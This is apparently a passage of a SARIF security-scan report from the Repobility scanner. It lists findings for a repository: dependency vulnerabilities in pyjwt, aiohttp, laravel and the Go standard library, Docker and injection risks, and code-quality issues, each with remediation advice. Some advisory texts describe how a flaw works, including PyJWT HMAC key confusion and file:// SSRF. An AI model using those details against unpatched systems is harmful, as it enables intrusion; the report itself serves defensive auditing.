{"version": "2.1.0", "$schema": "https://json.schemastore.org/sarif-2.1.0.json", "runs": [{"tool": {"driver": {"name": "Repobility", "informationUri": "https://repobility.com", "rules": [{"id": "JRN002", "name": "Browser storage is used for session token material", "shortDescription": {"text": "Browser storage is used for session token material"}, "fullDescription": {"text": "localStorage and sessionStorage are readable by injected JavaScript. For sensitive sessions, this turns XSS into account compromise."}, "properties": {"scanner": "repobility-journey-contract", "category": "auth", "severity": "medium", "confidence": 0.82, "cwe": "", "owasp": ""}}, {"id": "GHSA-65pc-fj4g-8rjx", "name": "idna: GHSA-65pc-fj4g-8rjx", "shortDescription": {"text": "idna: GHSA-65pc-fj4g-8rjx"}, "fullDescription": {"text": "Internationalized Domain Names in Applications (IDNA): Specially crafted inputs to idna.encode() can bypass CVE-2024-3651 fix"}, "properties": {"scanner": "osv-scanner", "category": "dependency", "severity": "medium", "confidence": 0.88, "cwe": "", "owasp": ""}}, {"id": "GHSA-jg22-mg44-37j8", "name": "aiohttp: GHSA-jg22-mg44-37j8", "shortDescription": {"text": "aiohttp: GHSA-jg22-mg44-37j8"}, "fullDescription": {"text": "AIOHTTP is Vulnerable to Deserialization of Untrusted Data"}, "properties": {"scanner": "osv-scanner", "category": "dependency", "severity": "medium", "confidence": 0.88, "cwe": "", "owasp": ""}}, {"id": "GHSA-hg6j-4rv6-33pg", "name": "aiohttp: GHSA-hg6j-4rv6-33pg", "shortDescription": {"text": "aiohttp: GHSA-hg6j-4rv6-33pg"}, "fullDescription": {"text": "AIOHTTP is vulnerable to cross-origin redirect with per-request cookies"}, "properties": {"scanner": "osv-scanner", "category": "dependency", "severity": "medium", "confidence": 0.88, "cwe": "", "owasp": ""}}, {"id": "GHSA-83wp-f5c3-hqqr", "name": "laravel/framework: GHSA-83wp-f5c3-hqqr", "shortDescription": {"text": "laravel/framework: GHSA-83wp-f5c3-hqqr"}, "fullDescription": {"text": "Laravel framework susceptible to reflected cross-site scripting"}, "properties": {"scanner": "osv-scanner", "category": "dependency", "severity": "medium", "confidence": 0.88, "cwe": "", "owasp": ""}}, {"id": "GHSA-78fx-h6xr-vch4", "name": "laravel/framework: GHSA-78fx-h6xr-vch4", "shortDescription": {"text": "laravel/framework: GHSA-78fx-h6xr-vch4"}, "fullDescription": {"text": "Laravel has a File Validation Bypass"}, "properties": {"scanner": "osv-scanner", "category": "dependency", "severity": "medium", "confidence": 0.88, "cwe": "", "owasp": ""}}, {"id": "GHSA-546h-56qp-8jmw", "name": "laravel/framework: GHSA-546h-56qp-8jmw", "shortDescription": {"text": "laravel/framework: GHSA-546h-56qp-8jmw"}, "fullDescription": {"text": "Laravel framework susceptible to reflected cross-site scripting"}, "properties": {"scanner": "osv-scanner", "category": "dependency", "severity": "medium", "confidence": 0.88, "cwe": "", "owasp": ""}}, {"id": "DKR002", "name": "Dockerfile base image has no explicit tag", "shortDescription": {"text": "Dockerfile base image has no explicit tag"}, "fullDescription": {"text": "Images without explicit tags resolve to a mutable default tag, which weakens reproducibility and review."}, "properties": {"scanner": "repobility-docker", "category": "docker", "severity": "medium", "confidence": 0.9, "cwe": "", "owasp": ""}}, {"id": "DKR001", "name": "Docker final stage has no non-root USER", "shortDescription": {"text": "Docker final stage has no non-root USER"}, "fullDescription": {"text": "Docker images run as root unless the image or Dockerfile switches to a non-root user."}, "properties": {"scanner": "repobility-docker", "category": "docker", "severity": "medium", "confidence": 0.82, "cwe": "", "owasp": ""}}, {"id": "DKR014", "name": "Dockerfile copies broad context with incomplete .dockerignore", "shortDescription": {"text": "Dockerfile copies broad context with incomplete .dockerignore"}, "fullDescription": {"text": "COPY . or ADD . is safer when .dockerignore excludes secrets, git history, keys, and generated artifacts."}, "properties": {"scanner": "repobility-docker", "category": "docker", "severity": "medium", "confidence": 0.76, "cwe": "", "owasp": ""}}, {"id": "SEC119", "name": "[SEC119] World-writable / world-readable file permissions: World-writable files let any local user (or container neighbo", "shortDescription": {"text": "[SEC119] World-writable / world-readable file permissions: World-writable files let any local user (or container neighbor) tamper with data; world-readable files leak secrets."}, "fullDescription": {"text": "Use 0600 (owner rw only) for secrets, 0644 for general files, 0700 for directories with secrets. Java: `setReadable(true, true)` (owner-only)."}, "properties": {"scanner": "repobility-threat-engine", "category": "security", "severity": "medium", "confidence": 1.0, "cwe": "", "owasp": ""}}, {"id": "SEC042", "name": "[SEC042] SQL identifier injection via f-string in cursor execute: f-string SQL normalizes an unsafe pattern. Currently s", "shortDescription": {"text": "[SEC042] SQL identifier injection via f-string in cursor execute: f-string SQL normalizes an unsafe pattern. Currently safe when only trusted internal values are interpolated (e.g. self._table in Odoo), but a future contributor can extend t"}, "fullDescription": {"text": "Use psycopg2.sql.SQL() + sql.Identifier() for identifiers:\n  from psycopg2 import sql\n  cr.execute(sql.SQL('UPDATE {} SET x=%s').format(sql.Identifier(table)), (value,))\nNever use f-string in cr.execute(). Values go through %s parameters."}, "properties": {"scanner": "repobility-threat-engine", "category": "injection", "severity": "medium", "confidence": 1.0, "cwe": "", "owasp": ""}}, {"id": "SEC015", "name": "[SEC015] Insecure Randomness for Security: Weak PRNG used in security-sensitive context. Output is predictable.", "shortDescription": {"text": "[SEC015] Insecure Randomness for Security: Weak PRNG used in security-sensitive context. Output is predictable."}, "fullDescription": {"text": "Use secrets module (Python) or crypto.getRandomValues() (JS) for security-sensitive randomness."}, "properties": {"scanner": "repobility-threat-engine", "category": "crypto", "severity": "medium", "confidence": 1.0, "cwe": "", "owasp": ""}}, {"id": "SEC136", "name": "[SEC136] AI-typical over-broad exception handler swallowing all errors: Catch-all exception block that silently returns ", "shortDescription": {"text": "[SEC136] AI-typical over-broad exception handler swallowing all errors: Catch-all exception block that silently returns success or no-ops. AI agents reach for this pattern when a flaky test or an unfamiliar API throws \u2014 wrap, swallow, retur"}, "fullDescription": {"text": "Catch the specific exception type, log at error level with full exception info, and return a failure-shaped result. If the operation is genuinely best-effort, log at warning and document why in a comment so the next reader (or scanner) knows."}, "properties": {"scanner": "repobility-threat-engine", "category": "quality", "severity": "medium", "confidence": 1.0, "cwe": "", "owasp": ""}}, {"id": "COMP001", "name": "[COMP001] High cognitive complexity: Function `check_skill_frontmatter` has cognitive complexity 17 (SonarSource scale).", "shortDescription": {"text": "[COMP001] High cognitive complexity: Function `check_skill_frontmatter` has cognitive complexity 17 (SonarSource scale). Cognitive complexity measures how hard the function is for a human to understand \u2014 nested branches, boolean chains, and"}, "fullDescription": {"text": "Extract nested branches into named helper functions; flatten early-return / guard clauses; replace long if/elif chains with dispatch dicts or polymorphism. SonarQube's threshold for 'should refactor' is 15 \u2014 yours is 17."}, "properties": {"scanner": "repobility-threat-engine", "category": "quality", "severity": "medium", "confidence": 0.95, "cwe": "", "owasp": ""}}, {"id": "SEC045", "name": "[SEC045] eval()/exec() on stored or user-supplied data: eval() and exec() on data \u2014 even admin-stored data \u2014 is a latera", "shortDescription": {"text": "[SEC045] eval()/exec() on stored or user-supplied data: eval() and exec() on data \u2014 even admin-stored data \u2014 is a lateral-movement vector after any one credential compromise. Sandboxes (__builtins__ cleared) are escapable: attackers use obj"}, "fullDescription": {"text": "For literal data structures: use ast.literal_eval(text) \u2014 only parses literals, raises on code.\nFor formula evaluation: use asteval or simpleeval (purpose-built sandboxes with allow-lists).\nFor Odoo: use odoo.tools.safe_eval(expr, locals_dict, mode='exec').\nIf you genuinely need to execute admin-stored code: require explicit super-admin permission AND log every execution with a stack trace."}, "properties": {"scanner": "repobility-threat-engine", "category": "injection", "severity": "medium", "confidence": 1.0, "cwe": "", "owasp": ""}}, {"id": "AGT013", "name": "Agent auto-approve or skip-permissions mode is easy to enable", "shortDescription": {"text": "Agent auto-approve or skip-permissions mode is easy to enable"}, "fullDescription": {"text": "Codex/agent auto-approve, YOLO, or skip-permissions modes can be useful in isolated automation, but they remove the human checkpoint before command execution, network access, and file edits."}, "properties": {"scanner": "repobility-agent-runtime", "category": "quality", "severity": "medium", "confidence": 0.68, "cwe": "", "owasp": ""}}, {"id": "AGT007", "name": "localStorage write failures are swallowed silently", "shortDescription": {"text": "localStorage write failures are swallowed silently"}, "fullDescription": {"text": "localStorage quotas are small and writes can fail. Catching storage errors without a user-visible warning causes silent data loss when notes, images, or snapshots exceed quota."}, "properties": {"scanner": "repobility-agent-runtime", "category": "quality", "severity": "medium", "confidence": 0.8, "cwe": "", "owasp": ""}}, {"id": "DEPCUR-NPM", "name": "npm package `@vitejs/plugin-react` is 1 major version(s) behind (^5.0.4 -> 6.0.2)", "shortDescription": {"text": "npm package `@vitejs/plugin-react` is 1 major version(s) behind (^5.0.4 -> 6.0.2)"}, "fullDescription": {"text": "`@vitejs/plugin-react` is pinned/resolved at ^5.0.4 but the latest stable release on the npm registry is 6.0.2 (1 major version(s) behind). Outdated dependencies accumulate unpatched bugs and make future security upgrades harder. This is the version-currency signal Dependabot version-update PRs raise."}, "properties": {"scanner": "repobility-dependency-currency", "category": "dependency", "severity": "medium", "confidence": 0.9, "cwe": "", "owasp": ""}}, {"id": "MINED111", "name": "Bare except continues silently", "shortDescription": {"text": "Bare except continues silently"}, "fullDescription": {"text": "Bare `except:` (or `except Exception:`) that runs code without re-raising or logging the exception. Hides real failures and makes bugs hard to diagnose."}, "properties": {"scanner": "repobility-ast-engine", "category": "quality", "severity": "medium", "confidence": 1.0, "cwe": "", "owasp": ""}}, {"id": "CORE_LARGE_FILES", "name": "Average file size is 503 lines (recommend <300)", "shortDescription": {"text": "Average file size is 503 lines (recommend <300)"}, "fullDescription": {"text": "Refactor large files by extracting related functions into separate modules. Target files with 300+ lines first. Use the Single Responsibility Principle \u2014 each module should have one clear purpose."}, "properties": {"scanner": "repobility-core", "category": "quality", "severity": "medium", "confidence": null, "cwe": "", "owasp": ""}}, {"id": "DKR012", "name": "Dockerfile keeps pip download cache", "shortDescription": {"text": "Dockerfile keeps pip download cache"}, "fullDescription": {"text": "Pip's package cache increases image size and can preserve unnecessary artifacts."}, "properties": {"scanner": "repobility-docker", "category": "docker", "severity": "low", "confidence": 0.72, "cwe": "", "owasp": ""}}, {"id": "DKR008", "name": ".dockerignore misses sensitive defaults", "shortDescription": {"text": ".dockerignore misses sensitive defaults"}, "fullDescription": {"text": ".dockerignore exists but does not cover common secret or VCS patterns."}, "properties": {"scanner": "repobility-docker", "category": "docker", "severity": "low", "confidence": 0.72, "cwe": "", "owasp": ""}}, {"id": "SEC004", "name": "[SEC004] SQL Injection Risk: String interpolation in SQL execution. Allows SQL injection.", "shortDescription": {"text": "[SEC004] SQL Injection Risk: String interpolation in SQL execution. Allows SQL injection."}, "fullDescription": {"text": "Use parameterized queries: connection.execute('SELECT * FROM t WHERE id = ?', [id]). For dynamic table or column names, choose identifiers from a hard-coded allowlist and keep values in parameters."}, "properties": {"scanner": "repobility-threat-engine", "category": "injection", "severity": "low", "confidence": 0.2, "cwe": "", "owasp": ""}}, {"id": "AIC003", "name": "Duplicated implementation block across source files", "shortDescription": {"text": "Duplicated implementation block across source files"}, "fullDescription": {"text": "Duplicated blocks are a common artifact when generated code is pasted or recreated instead of reused. They increase maintenance cost because every future bug fix must be found in multiple locations."}, "properties": {"scanner": "repobility-ai-code-hygiene", "category": "quality", "severity": "low", "confidence": 0.86, "cwe": "", "owasp": ""}}, {"id": "MINED043", "name": "[MINED043] Http Not Https: Hardcoded http:// (not localhost) for endpoints that handle credentials or data.", "shortDescription": {"text": "[MINED043] Http Not Https: Hardcoded http:// (not localhost) for endpoints that handle credentials or data."}, "fullDescription": {"text": "Review and fix per the pattern semantics. See CWE-319 / A02:2021 for context."}, "properties": {"scanner": "repobility-threat-engine", "category": "quality", "severity": "info", "confidence": 1.0, "cwe": "", "owasp": ""}}, {"id": "MINED067", "name": "[MINED067] Python Requests No Timeout: requests.get/post/etc. without timeout= can hang forever.", "shortDescription": {"text": "[MINED067] Python Requests No Timeout: requests.get/post/etc. without timeout= can hang forever."}, "fullDescription": {"text": "Review and fix per the pattern semantics. See CWE-400 /  for context."}, "properties": {"scanner": "repobility-threat-engine", "category": "quality", "severity": "info", "confidence": 1.0, "cwe": "", "owasp": ""}}, {"id": "SEC013", "name": "[SEC013] Path Traversal \u2014 User Input in File Path (and 2 more): Same pattern found in 2 additional files. Review if need", "shortDescription": {"text": "[SEC013] Path Traversal \u2014 User Input in File Path (and 2 more): Same pattern found in 2 additional files. Review if needed."}, "fullDescription": {"text": "Use os.path.realpath() and verify the path starts with your expected base directory. Use secure_filename() for uploads."}, "properties": {"scanner": "repobility-threat-engine", "category": "path_traversal", "severity": "info", "confidence": 0.2, "cwe": "", "owasp": ""}}, {"id": "MINED050", "name": "[MINED050] Stub Only Function (and 3 more): Same pattern found in 3 additional files. Review if needed.", "shortDescription": {"text": "[MINED050] Stub Only Function (and 3 more): Same pattern found in 3 additional files. Review if needed."}, "fullDescription": {"text": "Review and fix per the pattern semantics. See CWE-1188 /  for context."}, "properties": {"scanner": "repobility-threat-engine", "category": "quality", "severity": "info", "confidence": 0.2, "cwe": "", "owasp": ""}}, {"id": "MINED001", "name": "[MINED001] Bare Except Pass (and 2 more): Same pattern found in 2 additional files. Review if needed.", "shortDescription": {"text": "[MINED001] Bare Except Pass (and 2 more): Same pattern found in 2 additional files. Review if needed."}, "fullDescription": {"text": "Review and fix per the pattern semantics. See CWE-755 /  for context."}, "properties": {"scanner": "repobility-threat-engine", "category": "quality", "severity": "info", "confidence": 0.2, "cwe": "", "owasp": ""}}, {"id": "MINED062", "name": "[MINED062] Python Dataclass No Fields (and 19 more): Same pattern found in 19 additional files. Review if needed.", "shortDescription": {"text": "[MINED062] Python Dataclass No Fields (and 19 more): Same pattern found in 19 additional files. Review if needed."}, "fullDescription": {"text": "Review and fix per the pattern semantics."}, "properties": {"scanner": "repobility-threat-engine", "category": "quality", "severity": "info", "confidence": 0.2, "cwe": "", "owasp": ""}}, {"id": "MINED056", "name": "[MINED056] React Key As Index: key={index} in map() \u2014 re-renders the wrong elements on re-order.", "shortDescription": {"text": "[MINED056] React Key As Index: key={index} in map() \u2014 re-renders the wrong elements on re-order."}, "fullDescription": {"text": "Review and fix per the pattern semantics. See CWE-682 /  for context."}, "properties": {"scanner": "repobility-threat-engine", "category": "quality", "severity": "info", "confidence": 1.0, "cwe": "", "owasp": ""}}, {"id": "SEC029", "name": "[SEC029] Server-Side Request Forgery (SSRF) \u2014 outbound HTTP from user input (and 11 more): Same pattern found in 11 addi", "shortDescription": {"text": "[SEC029] Server-Side Request Forgery (SSRF) \u2014 outbound HTTP from user input (and 11 more): Same pattern found in 11 additional files. Review if needed."}, "fullDescription": {"text": "Validate the URL against an allowlist BEFORE fetching:\n  ALLOWED = {'images.example.com', 'cdn.example.com'}\n  host = urlparse(url).hostname\n  if host not in ALLOWED: abort(400)\nOr use a server-side proxy (Imgproxy / serve-files-only-from-S3) that isolates outbound network access from the request handler.\nBlock private CIDRs explicitly: 10/8, 172.16/12, 192.168/16, 169.254/16."}, "properties": {"scanner": "repobility-threat-engine", "category": "ssrf", "severity": "info", "confidence": 0.2, "cwe": "", "owasp": ""}}, {"id": "MINED045", "name": "[MINED045] Ts Non Null Assertion: x! asserts not null - bypasses null checks - TypeError if wrong.", "shortDescription": {"text": "[MINED045] Ts Non Null Assertion: x! asserts not null - bypasses null checks - TypeError if wrong."}, "fullDescription": {"text": "Review and fix per the pattern semantics. See CWE-476 /  for context."}, "properties": {"scanner": "repobility-threat-engine", "category": "quality", "severity": "info", "confidence": 1.0, "cwe": "", "owasp": ""}}, {"id": "MINED044", "name": "[MINED044] Js Console Log Prod: console.log left in code. Should be replaced with logger or removed.", "shortDescription": {"text": "[MINED044] Js Console Log Prod: console.log left in code. Should be replaced with logger or removed."}, "fullDescription": {"text": "Review and fix per the pattern semantics. See CWE-532 /  for context."}, "properties": {"scanner": "repobility-threat-engine", "category": "quality", "severity": "info", "confidence": 1.0, "cwe": "", "owasp": ""}}, {"id": "JRN009", "name": "Secret-like setting is echoed into a password input value", "shortDescription": {"text": "Secret-like setting is echoed into a password input value"}, "fullDescription": {"text": "Settings screens sometimes render API keys, tokens, or passwords back into HTML/JSX password fields. That still exposes the secret to page source, browser extensions, screenshots, and DOM scraping."}, "properties": {"scanner": "repobility-journey-contract", "category": "auth", "severity": "high", "confidence": 0.83, "cwe": "", "owasp": ""}}, {"id": "PYSEC-2026-161", "name": "starlette: PYSEC-2026-161", "shortDescription": {"text": "starlette: PYSEC-2026-161"}, "fullDescription": {"text": "BadHost: Missing Host header validation poisons request.url.path, bypassing path-based security checks"}, "properties": {"scanner": "osv-scanner", "category": "dependency", "severity": "high", "confidence": 0.88, "cwe": "", "owasp": ""}}, {"id": "PYSEC-2026-179", "name": "pyjwt: PYSEC-2026-179", "shortDescription": {"text": "pyjwt: PYSEC-2026-179"}, "fullDescription": {"text": "PyJWT is a JSON Web Token implementation in Python. Prior to 2.13.0, when the verifier is decoding JSON Web Tokens, while supporting both asymmetric and HMAC algorithms, the library does not validate use of JSON Web Keys in HMAC algorithm, allowing attacker to use the issuer public key as the secret key for HMAC algorithm. This vulnerability is fixed in 2.13.0."}, "properties": {"scanner": "osv-scanner", "category": "dependency", "severity": "high", "confidence": 0.88, "cwe": "", "owasp": ""}}, {"id": "PYSEC-2026-178", "name": "pyjwt: PYSEC-2026-178", "shortDescription": {"text": "pyjwt: PYSEC-2026-178"}, "fullDescription": {"text": "PyJWT is a JSON Web Token implementation in Python. From 2.8.0 to 2.12.1, when verifying detached JWS tokens using the unencoded-payload option (\"b64\": false, RFC 7797), PyJWT performs Base64URL decoding of the compact-serialization payload segment before enforcing the detached-payload rules. For b64=false, PyJWT later discards that decoded payload and replaces it with the caller-provided detached_payload. In practice, this turns the middle segment into an attacker-controlled \u201cwork amplifier\u201d: a remote client can supply an arbitrarily large Base64URL payload segment that forces CPU work + memory allocations even if the signature is invalid. This creates an unauthenticated DoS vector against any endpoint that verifies detached JWS using PyJWT. This vulnerability is fixed in 2.13.0."}, "properties": {"scanner": "osv-scanner", "category": "dependency", "severity": "high", "confidence": 0.88, "cwe": "", "owasp": ""}}, {"id": "PYSEC-2026-177", "name": "pyjwt: PYSEC-2026-177", "shortDescription": {"text": "pyjwt: PYSEC-2026-177"}, "fullDescription": {"text": "PyJWT is a JSON Web Token implementation in Python. Prior to 2.13.0, PyJWKClient.get_signing_key() forces a fresh HTTP request to the JWKS endpoint for every JWT with an unknown kid value, with no rate limiting. Since kid comes from the unverified token header, an attacker can trigger unlimited outbound requests. The vulnerability surfaces only when a JWKS fetch fails; an attacker can attempt to provoke that with sustained unknown-kid traffic, but the outcome depends on upstream JWKS-endpoint behavior (rate limiting, transient errors) which is beyond the attacker's control. This vulnerability is fixed in 2.13.0."}, "properties": {"scanner": "osv-scanner", "category": "dependency", "severity": "high", "confidence": 0.88, "cwe": "", "owasp": ""}}, {"id": "PYSEC-2026-175", "name": "pyjwt: PYSEC-2026-175", "shortDescription": {"text": "pyjwt: PYSEC-2026-175"}, "fullDescription": {"text": "PyJWT is a JSON Web Token implementation in Python. Prior to 2.13.0, PyJWKClient passes its uri argument directly to urllib.request.urlopen() which uses Python stdlib's default OpenerDirector registering HTTPHandler, HTTPSHandler, FTPHandler, FileHandler, and DataHandler. There is currently no documented option to restrict which schemes PyJWKClient will fetch. If an application's jku URL ingestion path accepts attacker-influenced URLs (e.g., from JWT header, configuration file, OAuth flow parameter), the attacker can cause PyJWKClient to read arbitrary local files via file:// (SSRF on local filesystem), cause PyJWKClient to attempt FTP / data-URI fetches (broader SSRF surface), or forge tokens that PyJWT verifies as valid. The library does not directly return non-HTTP(S) URI contents to the attacker; the chained \"plant a JWKS to forge tokens\" scenario described in the original report requires additional application-layer flaws (attacker write access to a filesystem path, untrusted jku "}, "properties": {"scanner": "osv-scanner", "category": "dependency", "severity": "high", "confidence": 0.88, "cwe": "", "owasp": ""}}, {"id": "GO-2026-5039", "name": "stdlib: GO-2026-5039", "shortDescription": {"text": "stdlib: GO-2026-5039"}, "fullDescription": {"text": "Arbitrary inputs are included in errors without any escaping in net/textproto"}, "properties": {"scanner": "osv-scanner", "category": "dependency", "severity": "high", "confidence": 0.88, "cwe": "", "owasp": ""}}, {"id": "GO-2026-5038", "name": "stdlib: GO-2026-5038", "shortDescription": {"text": "stdlib: GO-2026-5038"}, "fullDescription": {"text": "Quadratic complexity in WordDecoder.DecodeHeader in mime"}, "properties": {"scanner": "osv-scanner", "category": "dependency", "severity": "high", "confidence": 0.88, "cwe": "", "owasp": ""}}, {"id": "GO-2026-5037", "name": "stdlib: GO-2026-5037", "shortDescription": {"text": "stdlib: GO-2026-5037"}, "fullDescription": {"text": "Inefficient candidate hostname parsing in crypto/x509"}, "properties": {"scanner": "osv-scanner", "category": "dependency", "severity": "high", "confidence": 0.88, "cwe": "", "owasp": ""}}, {"id": "GO-2026-4986", "name": "stdlib: GO-2026-4986", "shortDescription": {"text": "stdlib: GO-2026-4986"}, "fullDescription": {"text": "Quadratic string concatentation in consumeComment in net/mail"}, "properties": {"scanner": "osv-scanner", "category": "dependency", "severity": "high", "confidence": 0.88, "cwe": "", "owasp": ""}}, {"id": "GO-2026-4982", "name": "stdlib: GO-2026-4982", "shortDescription": {"text": "stdlib: GO-2026-4982"}, "fullDescription": {"text": "Bypass of meta content URL escaping causes XSS in html/template"}, "properties": {"scanner": "osv-scanner", "category": "dependency", "severity": "high", "confidence": 0.88, "cwe": "", "owasp": ""}}, {"id": "GO-2026-4981", "name": "stdlib: GO-2026-4981", "shortDescription": {"text": "stdlib: GO-2026-4981"}, "fullDescription": {"text": "Crash when handling long CNAME response in net"}, "properties": {"scanner": "osv-scanner", "category": "dependency", "severity": "high", "confidence": 0.88, "cwe": "", "owasp": ""}}, {"id": "GO-2026-4980", "name": "stdlib: GO-2026-4980", "shortDescription": {"text": "stdlib: GO-2026-4980"}, "fullDescription": {"text": "Escaper bypass leads to XSS in html/template"}, "properties": {"scanner": "osv-scanner", "category": "dependency", "severity": "high", "confidence": 0.88, "cwe": "", "owasp": ""}}, {"id": "GO-2026-4977", "name": "stdlib: GO-2026-4977", "shortDescription": {"text": "stdlib: GO-2026-4977"}, "fullDescription": {"text": "Quadratic string concatenation in consumePhrase in net/mail"}, "properties": {"scanner": "osv-scanner", "category": "dependency", "severity": "high", "confidence": 0.88, "cwe": "", "owasp": ""}}, {"id": "GO-2026-4976", "name": "stdlib: GO-2026-4976", "shortDescription": {"text": "stdlib: GO-2026-4976"}, "fullDescription": {"text": "ReverseProxy forwards queries with more than urlmaxqueryparams parameters in net/http/httputil"}, "properties": {"scanner": "osv-scanner", "category": "dependency", "severity": "high", "confidence": 0.88, "cwe": "", "owasp": ""}}, {"id": "GO-2026-4971", "name": "stdlib: GO-2026-4971", "shortDescription": {"text": "stdlib: GO-2026-4971"}, "fullDescription": {"text": "Panic in Dial and LookupPort when handling NUL byte on Windows in net"}, "properties": {"scanner": "osv-scanner", "category": "dependency", "severity": "high", "confidence": 0.88, "cwe": "", "owasp": ""}}, {"id": "GO-2026-4947", "name": "stdlib: GO-2026-4947", "shortDescription": {"text": "stdlib: GO-2026-4947"}, "fullDescription": {"text": "Unexpected work during chain building in crypto/x509"}, "properties": {"scanner": "osv-scanner", "category": "dependency", "severity": "high", "confidence": 0.88, "cwe": "", "owasp": ""}}, {"id": "GO-2026-4946", "name": "stdlib: GO-2026-4946", "shortDescription": {"text": "stdlib: GO-2026-4946"}, "fullDescription": {"text": "Inefficient policy validation in crypto/x509"}, "properties": {"scanner": "osv-scanner", "category": "dependency", "severity": "high", "confidence": 0.88, "cwe": "", "owasp": ""}}, {"id": "GO-2026-4918", "name": "stdlib: GO-2026-4918", "shortDescription": {"text": "stdlib: GO-2026-4918"}, "fullDescription": {"text": "Infinite loop in HTTP/2 transport when given bad SETTINGS_MAX_FRAME_SIZE in net/http/internal/http2 in golang.org/x/net"}, "properties": {"scanner": "osv-scanner", "category": "dependency", "severity": "high", "confidence": 0.88, "cwe": "", "owasp": ""}}, {"id": "GO-2026-4870", "name": "stdlib: GO-2026-4870", "shortDescription": {"text": "stdlib: GO-2026-4870"}, "fullDescription": {"text": "Unauthenticated TLS 1.3 KeyUpdate record can cause persistent connection retention and DoS in crypto/tls"}, "properties": {"scanner": "osv-scanner", "category": "dependency", "severity": "high", "confidence": 0.88, "cwe": "", "owasp": ""}}, {"id": "GO-2026-4869", "name": "stdlib: GO-2026-4869", "shortDescription": {"text": "stdlib: GO-2026-4869"}, "fullDescription": {"text": "Unbounded allocation for old GNU sparse in archive/tar"}, "properties": {"scanner": "osv-scanner", "category": "dependency", "severity": "high", "confidence": 0.88, "cwe": "", "owasp": ""}}, {"id": "GO-2026-4865", "name": "stdlib: GO-2026-4865", "shortDescription": {"text": "stdlib: GO-2026-4865"}, "fullDescription": {"text": "JsBraceDepth Context Tracking Bugs (XSS) in html/template"}, "properties": {"scanner": "osv-scanner", "category": "dependency", "severity": "high", "confidence": 0.88, "cwe": "", "owasp": ""}}, {"id": "GO-2026-4864", "name": "stdlib: GO-2026-4864", "shortDescription": {"text": "stdlib: GO-2026-4864"}, "fullDescription": {"text": "TOCTOU permits root escape on Linux via Root.Chmod in os in internal/syscall/unix"}, "properties": {"scanner": "osv-scanner", "category": "dependency", "severity": "high", "confidence": 0.88, "cwe": "", "owasp": ""}}, {"id": "GO-2026-4603", "name": "stdlib: GO-2026-4603", "shortDescription": {"text": "stdlib: GO-2026-4603"}, "fullDescription": {"text": "URLs in meta content attribute actions are not escaped in html/template"}, "properties": {"scanner": "osv-scanner", "category": "dependency", "severity": "high", "confidence": 0.88, "cwe": "", "owasp": ""}}, {"id": "GO-2026-4602", "name": "stdlib: GO-2026-4602", "shortDescription": {"text": "stdlib: GO-2026-4602"}, "fullDescription": {"text": "FileInfo can escape from a Root in os"}, "properties": {"scanner": "osv-scanner", "category": "dependency", "severity": "high", "confidence": 0.88, "cwe": "", "owasp": ""}}, {"id": "GO-2026-4601", "name": "stdlib: GO-2026-4601", "shortDescription": {"text": "stdlib: GO-2026-4601"}, "fullDescription": {"text": "Incorrect parsing of IPv6 host literals in net/url"}, "properties": {"scanner": "osv-scanner", "category": "dependency", "severity": "high", "confidence": 0.88, "cwe": "", "owasp": ""}}, {"id": "GO-2026-4342", "name": "stdlib: GO-2026-4342", "shortDescription": {"text": "stdlib: GO-2026-4342"}, "fullDescription": {"text": "Excessive CPU consumption when building archive index in archive/zip"}, "properties": {"scanner": "osv-scanner", "category": "dependency", "severity": "high", "confidence": 0.88, "cwe": "", "owasp": ""}}, {"id": "GO-2026-4341", "name": "stdlib: GO-2026-4341", "shortDescription": {"text": "stdlib: GO-2026-4341"}, "fullDescription": {"text": "Memory exhaustion in query parameter parsing in net/url"}, "properties": {"scanner": "osv-scanner", "category": "dependency", "severity": "high", "confidence": 0.88, "cwe": "", "owasp": ""}}, {"id": "GO-2026-4340", "name": "stdlib: GO-2026-4340", "shortDescription": {"text": "stdlib: GO-2026-4340"}, "fullDescription": {"text": "Handshake messages may be processed at the incorrect encryption level in crypto/tls"}, "properties": {"scanner": "osv-scanner", "category": "dependency", "severity": "high", "confidence": 0.88, "cwe": "", "owasp": ""}}, {"id": "GO-2026-4337", "name": "stdlib: GO-2026-4337", "shortDescription": {"text": "stdlib: GO-2026-4337"}, "fullDescription": {"text": "Unexpected session resumption in crypto/tls"}, "properties": {"scanner": "osv-scanner", "category": "dependency", "severity": "high", "confidence": 0.88, "cwe": "", "owasp": ""}}, {"id": "GO-2025-4175", "name": "stdlib: GO-2025-4175", "shortDescription": {"text": "stdlib: GO-2025-4175"}, "fullDescription": {"text": "Improper application of excluded DNS name constraints when verifying wildcard names in crypto/x509"}, "properties": {"scanner": "osv-scanner", "category": "dependency", "severity": "high", "confidence": 0.88, "cwe": "", "owasp": ""}}, {"id": "GO-2025-4155", "name": "stdlib: GO-2025-4155", "shortDescription": {"text": "stdlib: GO-2025-4155"}, "fullDescription": {"text": "Excessive resource consumption when printing error string for host certificate validation in crypto/x509"}, "properties": {"scanner": "osv-scanner", "category": "dependency", "severity": "high", "confidence": 0.88, "cwe": "", "owasp": ""}}, {"id": "GO-2025-4015", "name": "stdlib: GO-2025-4015", "shortDescription": {"text": "stdlib: GO-2025-4015"}, "fullDescription": {"text": "Excessive CPU consumption in Reader.ReadResponse in net/textproto"}, "properties": {"scanner": "osv-scanner", "category": "dependency", "severity": "high", "confidence": 0.88, "cwe": "", "owasp": ""}}, {"id": "GO-2025-4014", "name": "stdlib: GO-2025-4014", "shortDescription": {"text": "stdlib: GO-2025-4014"}, "fullDescription": {"text": "Unbounded allocation when parsing GNU sparse map in archive/tar"}, "properties": {"scanner": "osv-scanner", "category": "dependency", "severity": "high", "confidence": 0.88, "cwe": "", "owasp": ""}}, {"id": "GO-2025-4013", "name": "stdlib: GO-2025-4013", "shortDescription": {"text": "stdlib: GO-2025-4013"}, "fullDescription": {"text": "Panic when validating certificates with DSA public keys in crypto/x509"}, "properties": {"scanner": "osv-scanner", "category": "dependency", "severity": "high", "confidence": 0.88, "cwe": "", "owasp": ""}}, {"id": "GO-2025-4012", "name": "stdlib: GO-2025-4012", "shortDescription": {"text": "stdlib: GO-2025-4012"}, "fullDescription": {"text": "Lack of limit when parsing cookies can cause memory exhaustion in net/http"}, "properties": {"scanner": "osv-scanner", "category": "dependency", "severity": "high", "confidence": 0.88, "cwe": "", "owasp": ""}}, {"id": "GO-2025-4011", "name": "stdlib: GO-2025-4011", "shortDescription": {"text": "stdlib: GO-2025-4011"}, "fullDescription": {"text": "Parsing DER payload can cause memory exhaustion in encoding/asn1"}, "properties": {"scanner": "osv-scanner", "category": "dependency", "severity": "high", "confidence": 0.88, "cwe": "", "owasp": ""}}, {"id": "GO-2025-4010", "name": "stdlib: GO-2025-4010", 